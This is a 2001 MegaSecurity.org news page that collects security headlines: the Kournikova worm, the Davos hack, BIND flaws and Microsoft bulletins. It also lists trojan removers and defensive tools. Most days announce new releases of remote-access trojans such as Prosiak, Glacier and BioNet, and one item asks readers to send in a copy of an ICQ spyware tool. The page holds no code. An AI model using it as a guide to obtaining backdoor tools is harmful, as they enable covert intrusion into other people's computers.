Don't Play 'Tennis' With Anna Kournikova. Read more

www.zdnet.com:
From Russia with love? Kournikova virus smashes Net. Read more

cbsnews.com:
Computer Virus Serves Up Problems. Read more

www.zdnet.com:
'Kournikova' Virus Uses Familiar Strategy. Read more

www.hoovershbn.hoovers.com:
Anna Kournikova -Themed E-Mail Worm Spreads at Record-Breaking Speeds. Read more

www.computerworld.com:
University Computers Remain Hacker Havens. Read more

www.accountancyage.com:
Hackers costing business billions. Read more

securityportal.com:
Firewalls - It's Time to Evolve or Die. Read more

securityportal.com:
Tracking Desperadoes, Documents, Computer Files, and Other Objects of Hackerdom. Read more

www.individual.com:
Reps. Saxton, Chambliss Intro Cyber-Terrorism Measure. Read more

www.wired.com:
Davos Hack: 'Good' Sabotage. Read more

www.iht.com:
Watch Your Cookies. Read more

www.gulf-news.com:
Etisalat hacking defendant pleads not guilty. Read more

www.it.fairfax.com.au:
Davos hackers wanted to `sap influence' of authorities. Read more

12 February 2001

Dagger 1.31b by lczer.

Links by SennaSpy:
- Scramdisk is a program that allows the creation and use of virtual encrypted drives.
  Basically, you create a container file on an existing hard drive which is created with a specific password.
  This container can then be mounted by the Scramdisk software which creates a new drive letter to represent the drive.
  The virtual drive can then only be accessed with the correct passphrase.
  Without the correct passphrase the files on the virtual drive are totally inaccessible. Read more
- Using Direct3D In Visual Basic: Read more
- Blowfish Crypt Algorithm Source Code (C, C++, ForTh, Pascal, Java): Read more
- GIF Library 1.0 - How to Manipulate GIF files with Win32 Assembly ! Full assembly source code ! Download
- Taskbar Utility for Kill Windows NT/2000 Processes: Full Source Code in Visual C++: Read more

www.rsasecurity.com:
RSA Laboratories' Frequently Asked Questions About Today's Cryptography, Version 4.1. Read more

Security Auditor's Research Assistant (SARA) is a security analysis tool based on the SATAN model. It is updated twice a month to address the latest threats. Checks for common old holes, backdoors, trust relationships, default CGI, common logins, open shares, and much more.

BackLog is a Windows NT service that facilitates the real time central collection and processing of Windows NT Event Log information.

News:
Website of Dutch Police defaced. The NPI (Nederlands Politie Instituut) was hacked last Saturday.
The hackers put texts like "Greet of Big Nose" between reports for wanted criminals.
No confidencal Information was on the site, according to the Police.

securityportal.com:
Weekly Microsoft Security Digest 2001/02/05 to 2001/02/11. Read more

LinuxSecurity.com:
Linux Security Week - February 12th 2001. Read more

securityportal.com:
Weekly Solaris Security Digest 2001/02/05 to 2001/02/11. Read more

news.bbc.co.uk:
Dubai 'hacker' due in court. Read more

www.nandotimes.com:
Hackers say attack was easy. Read more

www.it.fairfax.com.au:
Davos hackers wanted to `sap influence' of authorities. Read more

www.economictimes.com:
E-security needs change of traffic rules. Read more

www.nzherald.co.nz:
Govt looks at repelling hackers. Read more

www.timesofindia.com:
Hacking under Section 66 creates confusion. Read more

www.independent.co.uk:
Internet banks on security alert over software glitch. Read more

www.sfgate.com:
Hacker Tries to Put 'Lovebug' Behind. He says he uses hobby to help others, not hurt. Read more

www.newsbytes.com:
Reps. Saxton, Chambliss Intro Cyber-Terrorism Measure. Read more

www.antionline.com:
Hackers of a Different Color. Read more

web.lexis-nexis.com:
How to plug Web holes? Read more

web.lexis-nexis.com:
Hacker Tries to Put 'Lovebug' Behind; Read more

web.lexis-nexis.com:
The Truth About Virus Writers. Read more

web.lexis-nexis.com:
27 arrested since enforcement of antihacker law. Read more

web.lexis-nexis.com:
Hackers: Vandals or virtuosos? Read more

web.lexis-nexis.com:
FREELOADERS; SMART KIDS DOWNOAD FREE MOVIES, TV SHOWS, SONGS, AND BOOKS FROM THE INTERNET. Read more

web.lexis-nexis.com:
Law's Reach Stretches Into Internet ;The FBI's Online Eavesdropping Raises Troubling Privacy Issues. Read more

web.lexis-nexis.com:
Kent State U. police investigate costly computer crimes, student denies wrongdoing. Read more

11 February 2001

The Archive is restored.

Skydance 2.29 beta by Edrin.

PifWorm Remover cleans CuteElsa.JPG.pif - EmmaPeel.HTML.pif. By Del_Armg0. Thanks to HeLLfiReZ.

Links by SennaSpy:
News for programmers:
- ID Software (Quake !) Original Downloads. Many source codes for download ! :-) Read more
- Free! Borland C++ 5.5 Compiler - Command Line version. Read more
- Download a Flight Engine C++ Source Code. Good for Game´s Programmers: Read more

www.zdnet.com:
Don't be fooled: DCS1000 still a 'Carnivore' at heart. Read more

www.vnunet.com:
Hackers cost firms billions of dollars. Read more

www.crn.com:
Security Breaches Costly, Study Finds. Read more

www.zdnet.com:
How quickly should security flaws be made public? Read more

linuxtoday.com:
The Register: Symantec under attack over security patents on incremental software updates. Read more

www.viruslist.com:
"I-showed-you-so" Network Administrator Given Three Months in the Slammer. Read more

10 February 2001

Prosiak 0.70 beta 7. Thanks to Achates.

Links by SennaSpy:
News for programmers:
- MASM32 Version 6 Service Pack 1 Released: Download
- How to get Hard Disk Details in C++ ? (Source code available): Read more
- How I use .RAR (WinRar) files with my application ?
  Do you need know the "Unique´s" RAR File Library". This is a excellent project,
  writing for multiple Operating Systems: Win32, SunOs and Linux Full RAR 2.0 Support ! Available at: Read more
- UPX 1.06 - EXE Packer. The BEST EXE Packer in the world ! Available (with source code) at: Read more

Microsoft Security Bulletin MS01-007 (version 2.0)
Patch Available for “Network DDE Agent Request” Vulnerability. Read more

Mobman out of Cash? Read more

securityportal.com:
Trojans, Valentines and Love. Read more

www.zdnet.com:
Don't be fooled: DCS1000 still a 'Carnivore' at heart. Read more

www.newsfactor.com:
Hackers Said To Cost U.S. Billions. Read more

www.zdnet.com:
Cookie monster: Gnutella may expose users to data theft. Read more

news.cnet.com:
Gnutella swapping cookies, too. Read more

www.theregister.co.uk:
Gnutella leaves foolish people open to fraud. Read more

www.wired.com:
Feds Say Fidel Is Hacker Threat. Read more

www.thestar.com:
Hacking 101: Intro to cybercrime. Read more

news.bbc.co.uk:
Indian hackers busted. Read more

www.msnbc.com:
Norton AntiVirus proxy sends e-mail around in circles. Read more

www.vnunet.com:
Bug Watch: ISPs hold key to e-security. Read more

www.vnunet.com:
Viruses rampant in UK and Germany. Read more

www.latimes.com:
Suspected Hacker Jailed After Failing to Post Bail. Read more

www.sfgate.com:
Security Pros Seek Ways to Block Hacker. Read more

web.lexis-nexis.com:
Law's Reach Stretches Into Internet ;The FBI's Online Eavesdropping Raises Troubling Privacy Issues. Read more

09 February 2001

TheRipper 1.1

Prolin Worm Fix

Ramen Cleaner. This program repairs damage done by the Creative Prolin Worm

Links by SennaSpy:
OS (Operaing System) sources - Portuguese: Read more
Sky Operating System - 32 Bits - With source code available: Read more
TAG - The Asm Group. Brazilian's Cracking Group - Good Page: Read more
Reduce EXE and DLL size with LIBCTINY.LIB (for Visual C++): Read more

Network Security Training Conference: March 28-30 2001. Read more

www.antionline.com:
Romeo Virus Sweeps Through U. Penn Computers-(U. Pennsylvania). Read more

securityportal.com:
Don't Be Bit by the LoveBug. Read more

securityportal.com:
Weekly Virus Digest 2001/02/02 to 2001/02/08. Read more

mast.mcafee.com:
World Virus Map. Infected Files Over the Past 24 Hours. Read more

news.cnet.com:
Virus map paints U.S. red. Read more

www.emarketer.com:
Computer Virus Says 'Hey You' to AOL Users. Read more

www.vny.com:
Making cyberwar on bin Laden. Read more

www.worldnews.com:
Ex-Los Alamos Computer Whiz Jailed. Read more

www.economictimes.com:
Hactivisits motto: Oppose a policy? Hack the system. Read more

news.cnet.com:
Gnutella swapping cookies, too. Read more

www.sciam.com:
Are Digital Signatures Safe? Read more

www.mb.com.ph:
RSA co-developer disputes decoding method of Pinoy math enthusiast. Read more

www.zdnet.com.au:
Italian 'Love' bug damage minimal. Read more

www.vny.com:
Hackers attack Memorex website. Read more

sns.chicagotribune.com:
Hackers say 'love bug' was ammo in cyberwar. Read more

www.techweb.com:
Akamai To Protect Microsoft Sites. Read more

www.vnunet.com:
Intel adds security to file-swapping. Read more

www.vnunet.com:
New software gives hackers nowhere to hide. Read more

www.newsre.com:
Hacker Attacks Boost Saint Paul Technology Insurance Policies. Read more

salon.com:
Hunting the wild hacker. Read more

linuxtoday.com:
NewsForge: 2.4 kernel: Stealing some time with kernel hacker Geert Uytterhoeven. Read more

www.oregonlive.com:
Hackers prey on global forums. Read more

web.lexis-nexis.com:
ANALYSTS SEE THREAT OF TERRORISM BY FOES OF GLOBALIZATION. Read more

web.lexis-nexis.com:
EENVOY TO WAGE WAR ON HACKERS. Read more

web.lexis-nexis.com:
TERRORISTS TAKING UP CYBERSPACE. Read more

web.lexis-nexis.com:
Two boys latest victims of South Korea's cyber suicide wave. Read more

web.lexis-nexis.com:
E-mailers should assume someone's looking: experts. Read more

08 February 2001

TheRipper 1.0. Thanks to SennaSpy.

NetTrash 2.0 screenshot.

By SennaSpy: Register DLL and OCX files without regsvr32.exe. Read more

Subseven 2.2 will be out in 2-3 weeks. A beta version is tested right now. (Mobman)

Microsoft Security Bulletin MS01-008
NTLMSSP Privilege Elevation Vulnerability. Read more

www.ispworld.com:
Stopping A Trojan Horse. Read more

www.zdnet.com:
Italian 'Love Bug' hits Euro firms. Read more

www.zdnet.com:
'Love Bug' variant 'Cartolina' sending European postcards. Read more

www.telegraph.co.uk:
Virus threat multiplies. Read more

www.idg.net:
McAfee creates map to track global virus incidence. Read more

www0.mercurycenter.com:
Man accused of hacking into Web sites remains free. Read more

www.zdnet.com:
DDoS Attacks--One Year Later. Read more

salon.com:
Hunting the wild hacker. Read more

www.canoe.ca:
Hacker school open for business. Read more

www.it-director.com:
Security – What Security? Read more

www.thescotsman.co.uk:
Education is the safest way of alerting staff to security issues. Read more

www.internetnews.com:
Sites Still Vulnerable to Bug in IBM software. Read more

english.peopledaily.com.cn:
War Declared Against Cyber Crime in S. Korea. Read more

www.accessatlanta.com:
Terror plots hidden 'in plain view' on Web. Read more

thestar.com.my:
Secret porn messages, or terrorist codes? Read more

www.wired.com:
Bin Laden: Steganography Master? Read more

www.nationalpost.com:
Steaming open e-mail. Read more

www.worldnews.com:
Anti-Globalists Turn To Hacking. Read more

web.lexis-nexis.com:
Tech Brief: Hackers' Forum;World Economic Gathering Investigates Security Breach. Read more

web.lexis-nexis.com:
CRIMINALS SEEK FRESH PASTURES ONLINE. Read more

web.lexis-nexis.com:
SECURITY FIRMS SEEK WAYS TO MAKE WEB SITES LESS VULNERABLE TO ATTACKS. Read more

07 February 2001

Fatal Connections 2.0 by OpMan.

securityportal.com:
Top 20 Virus Report. Read more

www.zdnet.com:
Don't let 'Love' bug bite on Valentine's Day. Read more

enterprisesecurity.symantec.com:
St.Valentine's Day Makes Britons Vulnerable to 'I Love You' Emails - Study Finds. Read More

news.cnet.com:
Consumers could fall prey to "Love" bug variants. Read more

www.securityfocus.com:
Survey: Love Letter remains seductive. Read more

www.idg.net:
'Hey You' Virus Grabs More Than Your Attention. Read more

linuxtoday.com:
LinuxWorld: Stopping the Ramen worm. Read more

www0.mercurycenter.com:
Web sites act as host for extremist plots. Read more

www.latimes.com:
Extremists Said to Be Scrambling Messages on Web. Read more

www.usatoday.com:
Terror groups hide behind Web encryption. Read More

news.cnet.com:
Bin Laden uses Web to plan terror. Read more

cgi.usatoday.com:
Web hosts terror traffic Bin Laden linked to hidden messages. Read more

www.denverpost.com:
'Wiretap' e-mail bug turns up. Read more

www.wirednews.com:
Wait! Don't Forward That E-Mail. Read more

www.zdnet.com.au:
Email 'bugging' fears rise. Read more

www.wired.com:
The Internet: It's Full of Holes. Read more

www.hindustantimes.com:
Cops to tackle cyber crime. Read more

home.kyodo.co.jp:
Sony, Hitachi, other Web sites hacked. Read more

www.antionline.com:
Computer hackers penetrate the Colombian armed forces website. Read more

dailynews.yahoo.com:
Hackers Obliterate Egypt Central Bank Web Site. Read more

www.thestar.com:
Arafat, Clinton reported to be on hacker's hit list. Read more

www.naplesnews.com:
Gates, Albright, Arafat among thousands targeted by hackers. Read more

www.viruslist.com:
Easy to Implement Technique Could Render HTML-Formatted Messages Accessible by All. Read more

www.theregister.co.uk:
'CrackWhore' a boon to password-request sites. Read More

wired.com:
The Greatest Hacks of All Time. Read More

www.newsbytes.com:
Software Firm Rolls Out Security Hole Early-Warning System. Read More

www.iht.com:
Tech Brief: Hackers' Forum. Read more

www.oregonlive.com:
Hackers prey on global forums. Read more

linuxtoday.com:
NewsForge: 2.4 kernel: Stealing some time with kernel hacker Geert Uytterhoeven. Read more

www.atnewyork.com:
Famed Hacker Unmasked as Force Behind UrbanExpose.com. Read more

06 February 2001

Mantis 0.1 beta. Thanks to HeLLfiReZ.

BioNet 3.10 is out with an unpacked server. The plugin feature is great, but the HDK plugin is not my taste. Home Page

Microsoft Security Bulletin MS01-007.
Patch Available for "Network DDE Agent Request" Vulnerability. Read More

The "Reaper Exploit".
Email Can Be Wiretapped. It allows someone who sends you an email to see what you wrote when you forward the email with a comment to someone else. In other words, a wiretap. It's very illegal, but it's also very easy to do.".
www.geocities.com:
Reaper Exploit. Read More
www.zdnet.com.au:
Email 'bugging' fears rise. Read More
www.wired.com:
Wait! Don't Forward That E-Mail. Read More
www.idg.net:
JavaScript spy creates an email wiretap. Read More
www0.mercurycenter.com:
Group Warns Against E-Mail Wiretap. Read More
www.newsfactor.com:
Widespread E-mail Glitch Allows Spying. Read More
www.newsfactor.com:
Microsoft E-mail 'Out of Control'. Read More
www.theregister.co.uk:
JavaScript makes e-mail bugging easy. Read More
www.msnbc.com:
E-mail ‘wiretaps’ must be stopped. Read More
www.zdnet.com:
E-mail 'wiretap' could expose your messages to prying eyes. Read More
www.privacyfoundation.org:
FAQ: Web Bugs. Read More
www.privacyfoundation.org:
Email Wiretapping Exploit. Read More
www.privacycenter.du.edu:
Email Wiretap -- For Demonstration Purposes ONLY! Read More

www.cnn.com:
Hackers apparently got data on 1,400 leaders. Read More

www.theregister.co.uk:
Love Bug author says bug created in cyber gang war. Read More

www.zdnet.co.uk:
Fault in antivirus tool. Read More

www.newsbytes.com:
New Security Firm Targets DoS Attacks. Read More

www.viruslist.com:
"Abandon Ship! Abandon Ship!" - Linux Takes on Water. Read More

www.abc.net.au:
Tas Govt web site apparently attacked by hackers. Read More

www.zdnet.com:
Openhack III undefeated. Read More

www.iht.com:
Tech Brief: Hackers' Forum. Read More

securityportal.com:
And the Floppies Spoke for the Victim. Read More

05 February 2001

BSE Trojan

Inside the Mind of Dark Avenger.
The Bulgarian Dark Avenger writes viruses. Much like Hannibal Lecter, he is clever - and cunningly dangerous. In a unique interview, Sarah Gordon - much like Clarice Starling - explores the cold logic of a criminal brain. Read More

The ICQ Protocol. Read More

Em@ilFile.com help you to download files. It will send any files to your mailbox. Read More.

W32/Apology-B is a Win 32 is a file infecting virus with email-aware worm and backdoor characteristics. Read More

gamelan.earthweb.com:
Thoughts on Java and Open Source Security. Read More

www.bsdtoday.com:
BIND news and DNS alternatives. Read More

News:
securityportal.com:
Weekly Microsoft Security Digest 2001/01/29 to 2001/02/04. Read More

linuxtoday.com:
Linux Security Week - February 5th 2001. Read More

securityportal.com:
Weekly BSD Security Digest 2001/01/29 to 2001/02/04. Read More

securityportal.com:
Weekly Check Point Security Digest 2001/01/29 to 2001/02/04. Read More

www.independent.co.uk:
Cyberhackers steal credit card details from world leaders. Read More

Anti-Globalization Hackers Copied Credit Card, Phone Numbers. Read More

news.bbc.co.uk:
Hackers steal Davos data. Read More

www.cnn.com:
Hackers got into Davos system. Read More

thestandard.com:
The World Economic Forum's Big Hack Attack. Read More

Hackers breached Davos security. Read More

www.financialexpress.com:
World Economic Forum says hackers broke into its system. Read More

www.abc.net.au:
Hackers steal confidential data from rich and powerful at WEF. Read More

www.iol.co.za:
Hackers steal confidential data at Davos. Read More

www.economictimes.com:
Military training for cyber war. Read More

www.suntimes.com:
High demand for tech detectives. Read More

www.abc.net.au:
Tas Govt web site apparently attacked by hackers. Read More

centraleurope.com:
First Bosnian to Face Hacking Charges. Read More

www.economictimes.com:
Melissa, Lovebug didn’t teach many lessons. Read More

www.zdnet.co.uk:
Virus alerts give options for delivery. Read More

www.miamiherald.com:
Push is on to tighten cyberspace security. Read More

www.usnews.com:
How to plug Web holes? Read More

www.nypostonline.com:
COMPUTER CRIME CASTING WIDE NET OVER BIZ & GOV'T. Read More

web.lexis-nexis.com:
SHE-MAIL HACKERS; REVIEW AS TD HARNEY'S COMPUTER SYSTEM IS BREACHED.. TWICE. Read More

web.lexis-nexis.com:
Hacking Suspect Turns Himself In for Trial. Read More

web.lexis-nexis.com:
CYBER SECURITY: Worming Through Security. Read More

web.lexis-nexis.com:
Computer beginners particularly prone to virus attack. Read More

04 February 2001

Glacier 3.0. Thanks to ISO.

McAfee:
Internet Worm W32/Rast.2060. Read More

www.theregister.co.uk:
MS uses Office registrations to enforce licences, steal customers. Read More

www.zdnet.com:
Cyberlawyer: Hackers are people, too! Read More

www.zdnet.com:
NSA attempting to design crack-proof computer. Read More

Associated Newspapers Ltd:
Hacker's sabotage threat foiled. Read More

www.antionline.com:
The Fear of Being Hacked. Read More

www.zdnetasia.com:
RSA encryption cracked. Read More

www.securitywatch.com:
AOL all riled up over Ukrainian ICQ spyware. Read More
See also here
Anybody has a url or a copy of this tool? Please send to MegaSecurity

www.securityfocus.com:
Nortel getting too personal. Read More

www.securitywatch.com:
OpenHack III: PitBull's integrity remains intact. Read More

news.excite.com:
Web Security Firm NAI Says Deflects Attack. Read More

www.washingtonpost.com:
Extreme Security For Web Servers. Read More

www.securitywatch.com:
System admin will do time for DoS attack. Read More

www.securitywatch.com:
Get patching those BIND vulnerabilities. Now. Read More

web.lexis-nexis.com:
Hacking Suspect Turns Himself In for Trial. Read More

web.lexis-nexis.com:
COMPANY TOWN; MCAFEE ISSUES CONTROVERSIAL BUG ADVISORY. Read More

web.lexis-nexis.com:
Hacker blocks council website. Read More

03 February 2001

Glacier 2.2. Thanks to ISO.

Tiny Personal Firewall represents smart, easy-to-use personal security technology that fully protects personal computers against hackers.

Tesseract is a network utility for Windows 2000. It displays network traffic between a network interface on your computer and remote computers. It also analyses this data and report suspicious activities such as traceroutes, pings, portscans etc. Please note that this program is in an early beta stage, and thus lacks proper documentation and configuration ability. Most items in the configuration window are unavailable for the time being.

Sub7 STOP! 0.1.07
This is a sub7 fake server that listens to the default port (27374) of the Trojan horse waiting for connections. If someone tries to connect, the program will accept the connection and will send to the sub7 client a fake message.

www.netsurf.com:
Speaking of Which, Bugtraq Gets a BIND Trojan. Read More

archives.neohapsis.com:
Bind 8 Exploit - Trojan. Read More

archives.neohapsis.com:
offending code of bind trojan. Read More

www.pcformat.co.uk:
Sulking hackers strike back at NAI. Read More

news.ft.com:
Hackers trick security experts. Read More

www.theregister.co.uk:
AOL users warning over 'rapidly spreading' Trojan. REad More

www.planetit.com:
'Hey You' Virus Hits AOL Users. Read More

www.informationweek.com:
New Virus: Danger Moderate, Annoyance High. Read More

www.antionline.com:
Connected ; Hunting for the Snow White Virus. Read More

web.lexis-nexis.com:
SOFTWARE MAKER SAYS VIRUS HAS HIT MILLIONS OF PCS AND FILES OF AOL USERS. Read More

www.newsbytes.com:
DDoS Subject Of Security Conference. Read More

web.lexis-nexis.com:
Denial-of-Service Attacks Targeted at Major Internet Security Conference To Be Held in Alexandria, VA on March 21-22. Read More

www.theregister.co.uk:
Encryption vs anti-virus. Read More

www.zdnetasia.com:
ACCC warns of false domain name renewals. Read More

www.techweb.com:
Vigilance Is Key To Security, Experts Say. Read More

siliconvalley.internet.com:
Alleged eBay Hacker Free On Oversight. Read More

www.infoworld.com:
Report recommends overhaul of cyberdefenses. Read More

www.nandotimes.com:
eBay to start hiding customers' e-mail addresses. Read More

hongkong1.cnet.com:
NSA looks to Linux for virtual security. Read More

www.zdnet.com:
NSA attempting to design crack-proof computer. Read More

02 February 2001

MiniBackLash 1.0 Beta by Savage3. Thanks to Vladimir.

Daodan 1.23 by ?.

www.zdnet.com.au:
Trojan horse targets AOL. Read More

abcnews.go.com:
‘Hey You’ — Keep an Eye Out. Read More

www.newsbytes.com:
Password-Stealing Trojan Resurfaces - Update. Read More

www.cnn.com:
Virus may steal AOL users' passwords. Read More

www.zdnet.com:
AOL sees red over ICQ spying programs. Read More

securityportal.com:
Weekly Virus Digest 2001/01/26 to 2001/02/01. Read More

www.wired.com:
Security Mavens Invaded by Trojan. Read More

securityportal.com:
Internet Hygiene. Read More

www.zdnet.com:
Network Associates hit with DoS attack. Read More

www.vnunet.com:
Security watchers duped into cyber attack. Read More

chicagotribune.com:
`LOVE BUG' VIRUS THE ONE THAT GOT AWAY, HACKERS SAY. Read More

linuxtoday.com:
LinuxPPC.org: Security Advisory -- bind. Read More

news.cnet.com:
NSA looks to Linux for virtual security. Read More

www.newsbytes.com:
New Security Software Thinks Like A Hacker. Read More

www.nandotimes.com:
eBay to start hiding customers' e-mail addresses. Read More

www.newsbytes.com:
Former System Admin. Sentenced For Hacking NY Court Web Site. Read More

www.thisislondon.co.uk:
Hacker's sabotage threat foiled. Read More

www.philstar.com:
Hacker takes P.2M from ATM machine. Read More

www.bday.co.za:
Take note that hackers' are actually crackers'. Read More

web.lexis-nexis.com:
HACKERS HURT MORE THAN TARGETS. Read More

01 February 2001

Undetected 3.3 by Knox_rw.

Snid X3 1.2 by Spok & Sug@rush. Thanks to Vladimir.

FC ICQ Pager 0.2

Bulletin MS01-006
Patch Available for "Invalid RDP Data" Vulnerability. Read More

Crank is short for "CRyptANalysis toolKit", and its overall purpose is to provide a powerful and extensible environment for solving classical (pen-and-paper) ciphers, providing as much automation as possible.

Integrit is an alternative to file integrity verification programs like tripwire and aide. It helps you determine whether an intruder has modified a computer system.

Mcaffee:
New Virus: Girls of Playboy Hoax. Read More

News:
www.computerweekly.com:
Microsoft defence leaves dynamic content vulnerable. Read More

www.newsfactor.com:
DoS Attacks: Internet Plague Without a Cure? Read More

news.ft.com:
Security breach hits websites. Read More

www.mg.co.za:
Race to shut out Net software hackers. Read More

www.individual.com:
EU Sets Out Plan to Combat Cybercrime. Read More


Copyright© MegaSecurity.org